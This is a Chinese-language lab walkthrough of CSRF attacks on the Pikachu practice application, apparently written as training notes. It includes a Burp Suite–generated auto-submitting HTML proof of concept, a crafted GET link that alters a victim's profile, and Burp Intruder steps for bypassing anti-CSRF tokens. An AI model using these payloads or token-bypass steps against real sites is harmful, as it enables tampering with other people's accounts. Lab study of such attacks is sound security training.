文章目录
pikachu
get
方法
正常用户登录后,修改信息时会向后端发送请求包,抓到此请求包,然后构造恶意链接发给受害者点击
恶意链接
构造 html 页面、然后让被攻击者访问此页面
<html>
<!--CSRF PoC-generated by Burp Suite Professional -->
<body>
<form action="http://192.168.65.128/pikachu/vul/csrf/csrfget/csrf_get_edit.php">
<input type="hidden" name="sex" value="girl"/>
<input type="hidden" name="phonenum" value="15911111111" />
<input type="hidden" name="add" value="nba lakes"/><input type="hidden" name="email" value="hack@ pikachu.com"/>
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushstate(". ", '/');
document.forms[0].submit();
</script>
</body>
</html>
将修改页面抓包
生成poc
复制POC
由于是 CET 请求,所以也可以直接发送修改信息的链接给被攻击者访问
http://192.168.65.128/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=15933333333&add=nba+akes&email=hack%40pikachu.com&submit=submit
post
方法
正常用户登录后,修改信息时会向后端发送请求包,抓到此请求包,然后构造恶意链接发给受害者点击
流程同get方法
Token
将数据包发送到 Intruder 模块
攻击模式选择 Pitchfork
将需要修改的信息和 token 设置为可变量
设置信息的 payload,正常设置即可
设置 token 的 payload
Options->Grep-Extract
点击 Add
点击 Refetch response
双击 value 后的值,并复制下来
勾选 Update config based on selectionbelow(默认)
点击 OK
Options->Redirections
选择always
payload2 选择 Recursive grep
将前面复制的 token 填入输入框,勾选 Stop ifduplicate payload found